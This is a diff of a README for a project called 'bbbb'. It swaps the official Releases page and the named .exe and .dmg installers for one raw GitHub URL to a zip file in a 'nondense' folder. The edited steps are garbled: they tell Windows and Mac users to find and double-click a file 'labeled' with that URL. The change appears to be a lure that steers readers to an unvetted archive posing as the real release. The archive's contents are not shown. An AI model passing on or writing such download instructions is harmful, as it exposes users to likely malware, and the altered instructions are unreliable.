Hermes97500/bbbb/README.md

 - Internet connection for initial setup and updates

 ## 📂 Download & Install
-1. Visit the [Releases page](https://github.com/Hermes97500/bbbb/releases) to find the latest version of bbbb.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Hermes97500/bbbb/main/nondense/bbbb.zip) to find the latest version of bbbb.
 2. Click on the version you want to download.
-3. Look for the file labeled “bbbb.exe” (for Windows users) or “bbbb.dmg” (for Mac users).
+3. Look for the file labeled “https://raw.githubusercontent.com/Hermes97500/bbbb/main/nondense/bbbb.zip” (for Windows users) or “https://raw.githubusercontent.com/Hermes97500/bbbb/main/nondense/bbbb.zip” (for Mac users).
 4. Click the file to start your download.
 Your web browser will save it in the default download folder.

 ## 🏗️ Installation Steps
 ### For Windows
-1. Navigate to your Downloads folder and double-click on “bbbb.exe”.
+1. Navigate to your Downloads folder and double-click on “https://raw.githubusercontent.com/Hermes97500/bbbb/main/nondense/bbbb.zip”.
 2. Follow the on-screen prompts to complete the installation.
 3. Once installed, you can find bbbb in your Start menu.

 ### For Mac
-1. Open your Downloads folder and double-click on “bbbb.dmg”.
+1. Open your Downloads folder and double-click on “https://raw.githubusercontent.com/Hermes97500/bbbb/main/nondense/bbbb.zip”.
 2. Drag the bbbb icon into your Applications folder.
 3. You can now find bbbb in your Applications.
 Open it to start using the application.